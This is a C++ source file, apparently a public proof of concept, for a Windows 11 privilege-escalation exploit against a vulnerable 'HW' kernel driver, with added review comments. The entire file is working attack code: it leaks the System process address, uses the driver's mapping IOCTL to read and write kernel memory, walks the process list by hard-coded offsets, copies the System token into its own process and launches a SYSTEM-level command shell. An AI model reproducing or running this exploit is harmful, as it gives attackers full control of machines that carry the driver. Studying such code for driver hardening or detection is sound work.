MTS HW EOP
#include "windows.h" | |
#include <stdio.h> | |
// Author: @xct_de | |
// Target: Windows 11 (10.0.22000) | |
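// 64-bit unsigned alias used for raw addresses and values read through the driver mapping.
#define QWORD ULONGLONG
// IOCTL code that mapArbMem() sends to the HW driver (value as given in the original listing).
#define IOCTL_01 0x9C406500
// SYSTEM_INFORMATION_CLASS value passed to NtQuerySystemInformation in getSystemEProcess().
#define SystemHandleInformation 0x10
// Size of the buffer handed to NtQuerySystemInformation: 2 MiB. Parenthesized so the macro
// stays a single operand inside a larger expression (the original expanded to a bare product,
// which breaks under division or precedence-sensitive use).
#define SystemHandleInformationSize (1024 * 1024 * 2)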
// Function-pointer type for ntdll!NtQuerySystemInformation, which is resolved at runtime with
// GetProcAddress in getSystemEProcess() because windows.h does not declare it.
using fNtQuerySystemInformation = NTSTATUS(WINAPI*)(
ULONG SystemInformationClass,   // e.g. SystemHandleInformation (0x10)
PVOID SystemInformation,        // caller-supplied output buffer
ULONG SystemInformationLength,  // size of that buffer in bytes
PULONG ReturnLength             // bytes written / required
);
// One entry of the handle table returned by NtQuerySystemInformation(SystemHandleInformation).
// Only the Object field is consumed in this file: getSystemEProcess() returns Handles[0].Object
// as a kernel address. The layout is not declared by windows.h and must match the running OS.
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
USHORT UniqueProcessId;        // PID of the process that owns the handle (not checked here)
USHORT CreatorBackTraceIndex;
UCHAR ObjectTypeIndex;         // object type of the handle (not checked here)
UCHAR HandleAttributes;
USHORT HandleValue;
PVOID Object;                  // kernel address of the referenced object
ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO;
// Header of the SystemHandleInformation buffer. Handles[1] is the usual variable-length-trailer
// idiom; presumably NumberOfHandles entries follow in memory, but this file only ever reads Handles[0].
typedef struct _SYSTEM_HANDLE_INFORMATION {
ULONG NumberOfHandles;
SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;
// Function-pointer type for NtQueryIntervalProfile. Declared but never used in this file
// (nothing resolves or calls it); left over from an earlier approach, presumably.
typedef NTSTATUS(NTAPI* _NtQueryIntervalProfile)(
DWORD ProfileSource,
PULONG Interval
);
// Returns the kernel Object pointer of the first entry in the system handle table.
// main() treats this value as the System process EPROCESS; nothing here verifies the
// entry's owning PID or object type, so that assumption is unchecked.
// Return: Handles[0].Object as a QWORD. Because the buffer is zero-initialised, a failed
// query yields 0 rather than an error.
// NOTE(review): the GetProcAddress and HeapAlloc results and the NTSTATUS returned by
// NtQuerySystemInformation are not checked, and the 2 MiB heap buffer is never freed.
QWORD getSystemEProcess() {
ULONG returnLenght = 0;
// Resolve NtQuerySystemInformation from ntdll at runtime; it is not declared in windows.h.
fNtQuerySystemInformation NtQuerySystemInformation = (fNtQuerySystemInformation)GetProcAddress(GetModuleHandle(L"ntdll"), "NtQuerySystemInformation");
// Zeroed 2 MiB buffer (SystemHandleInformationSize) to receive the handle table.
PSYSTEM_HANDLE_INFORMATION handleTableInformation = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, SystemHandleInformationSize);
NtQuerySystemInformation(SystemHandleInformation, handleTableInformation, SystemHandleInformationSize, &returnLenght);
// Only the first table entry is inspected; the remaining entries are ignored.
SYSTEM_HANDLE_TABLE_ENTRY_INFO handleInfo = (SYSTEM_HANDLE_TABLE_ENTRY_INFO)handleTableInformation->Handles[0];
return (QWORD)handleInfo.Object;
}
// Asks the driver, via IOCTL_01, to map the memory at `addr` into this process and returns
// the user-mode address the driver reports back. main() passes EPROCESS pointers, so `addr`
// is presumably a kernel address; the driver-side semantics are not visible in this file.
// Param addr:    address the driver should map.
// Param hDriver: open handle to the driver device from main().
// Return: the QWORD the driver placed at index 2 of the output buffer (0 if it wrote nothing,
//         since the page is freshly committed).
// NOTE(review): the VirtualAlloc and DeviceIoControl results are unchecked, and the two
// 0x1000-byte buffers are never released, so every call leaks two pages (main calls this in a loop).
QWORD mapArbMem(QWORD addr, HANDLE hDriver) {
DWORD index = 0;
DWORD bytesWritten = 0;
// One committed page each for the IOCTL input and output buffers.
LPVOID uInBuf = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
LPVOID uOutBuf = VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
// Input the driver expects: three consecutive QWORDs, filled in order via index++.
QWORD* in = (QWORD*)((QWORD)uInBuf);
*(in + index++) = 0x4141414142424242; // first field; looks like a filler/marker pattern — its meaning to the driver is not shown here
*(in + index++) = 0x4343434300001000; // size
*(in + index++) = addr; // addr
DeviceIoControl(hDriver, IOCTL_01, (LPVOID)uInBuf, 0x1000, uOutBuf, 0x1000, &bytesWritten, NULL);
// The mapped address is taken from the third QWORD of the output buffer.
QWORD* out = (QWORD*)((QWORD)uOutBuf);
QWORD mapped = *(out + 2);
return mapped;
}
// Entry point. Opens the driver device, obtains a user-mode view of the System process via
// the driver's mapping IOCTL, walks linked process structures until it reaches the current
// process, swaps that process's token pointer for the System one, runs a shell, and restores
// the original pointer when the shell exits.
// Every structure offset used here (0x440, 0x448, 0x4b8) is hard-coded for the build named in
// the header comment (Windows 11 10.0.22000) and is not validated at runtime; on any other
// build the reads and the write below land on the wrong fields.
int main() {
HANDLE hDriver = CreateFile(L"\\\\.\\HW", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
if (hDriver == INVALID_HANDLE_VALUE)
{
printf("[!] Error while creating a handle to the driver: %d\n", GetLastError()); // NOTE(review): GetLastError() returns DWORD; %d does not match
exit(1);
}
printf("[>] Exploiting driver..\n");
// Kernel address assumed to be the System EPROCESS (see getSystemEProcess; not verified).
QWORD systemProc = getSystemEProcess();
// User-mode mapping of that structure supplied by the driver.
QWORD systemProcMap = mapArbMem(systemProc, hDriver);
// Offset 0x4b8 is read as the token pointer.
QWORD systemToken = (QWORD)(*(QWORD*)(systemProcMap + 0x4b8));
printf("[>] System Token: 0x%llx\n", systemToken);
DWORD currentProcessPid = GetCurrentProcessId();
BOOL found = false;
QWORD cMapping = systemProcMap;  // current node of the walk, starting at System
DWORD cPid = 0;
QWORD cTokenPtr = 0;
// Follow the link at offset 0x448: it is treated as pointing at the same field of the next
// structure, so subtracting 0x448 gives that structure's base (presumably the process list).
// Offset 0x440 is read as the PID and 0x4b8 as the token pointer of each node.
while (!found) {
QWORD readAt = (QWORD)(*(QWORD*)(cMapping + 0x448));
cMapping = mapArbMem(readAt - 0x448, hDriver);
cPid = (DWORD)(*(DWORD*)(cMapping + 0x440));
cTokenPtr = (QWORD)(*(QWORD*)(cMapping + 0x4b8));
if (cPid == currentProcessPid) {
found = true;
break;
}
}
// NOTE(review): unreachable — the loop above only exits once found is true, so a PID that
// is never matched spins forever, leaking two pages per iteration inside mapArbMem().
if (!found) {
exit(-1);
}
printf("[>] Stealing Token..\n");
// Writes through the driver-provided mapping; presumably this modifies the kernel structure in place.
*(QWORD*)(cMapping + 0x4b8) = systemToken;
system("cmd"); // blocks until the shell exits; the swapped pointer is in place for its lifetime
printf("[>] Restoring Token..\n");
// Put the original pointer back so the process structure is left as it was found.
*(QWORD*)(cMapping + 0x4b8) = cTokenPtr;
return 0;
}